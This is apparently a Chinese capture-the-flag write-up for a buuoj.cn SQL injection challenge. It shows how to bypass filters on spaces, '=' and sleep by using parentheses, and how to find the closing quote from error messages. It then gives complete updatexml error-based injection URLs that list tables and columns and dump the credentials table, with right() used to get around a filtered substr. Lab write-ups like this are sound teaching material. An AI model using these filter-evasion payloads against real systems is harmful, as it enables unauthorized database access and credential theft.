如题是⼀个注⼊,
这题在空格后⾯不能带字符、不能有=号、sleep。
尝试过%20 %09(tab)⽤不了
出现了下⾯这个⻚⾯已经表示可以使⽤报错注⼊了。(syntax error)
使⽤1',注意需要区分⼤⼩写,必须要英⽂键盘的',看到报错了
注意判断闭合符号时候,需要看near的信息,这个信息会先打上⼀个'' 双引号。
判断闭合符号核⼼就在于看报错,如果报错了,说明形成了新的闭合,不然按照之前的闭合肯定是正常的。
使⽤http://e7d6b403-ed8a-40d2-8abc-0ef886262d69.node4.buuoj.cn:81/check.php?
username=22&password=11'or(select(1))%23
这⾥要注意如下,直接输⼊updatexml是有sql syntax error的:
直接开始报错注⼊:
输⼊
http://8f4498ca-cd27-4251-b126-1de126b28554.node4.buuoj.cn:81/check.php?
username=22&password=11'or(updatexml(1,concat(0x7e,
(select(group_concat(table_name))from(information_schema.tables)),0x7e),3))%23
输⼊http://8f4498ca-cd27-4251-b126-1de126b28554.node4.buuoj.cn:81/check.php?
username=22&password=11%27or(updatexml(1,concat(0x7e,
(select(group_concat(table_name))from(information_schema.tables)where((table_schema)like(database()))),0x7
e),3))%23
输⼊http://8f4498ca-cd27-4251-b126-1de126b28554.node4.buuoj.cn:81/check.php?
username=22&password=11%27or(updatexml(1,concat(0x7e,
(select(group_concat(column_name))from(information_schema.columns)where((table_name)like('H4rDsq1'))),0x
7e),3))%23
输⼊http://8f4498ca-cd27-4251-b126-1de126b28554.node4.buuoj.cn:81/check.php?
username=22&password=11%27or(updatexml(1,concat(0x7e,
(select(group_concat(id,username,password))from(H4rDsq1)),0x7e),3))%23
发现⻓度不够,但是substr⼜被过滤了,不给⽤。
因此使⽤right函数即可http://8f4498ca-cd27-4251-b126-1de126b28554.node4.buuoj.cn:81/check.php?
username=22&password=11%27or(updatexml(1,concat(0x7e,right((select(group_concat(password))from(H4rD
sq1)),23),0x7e),3))%23
扫一扫
239
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
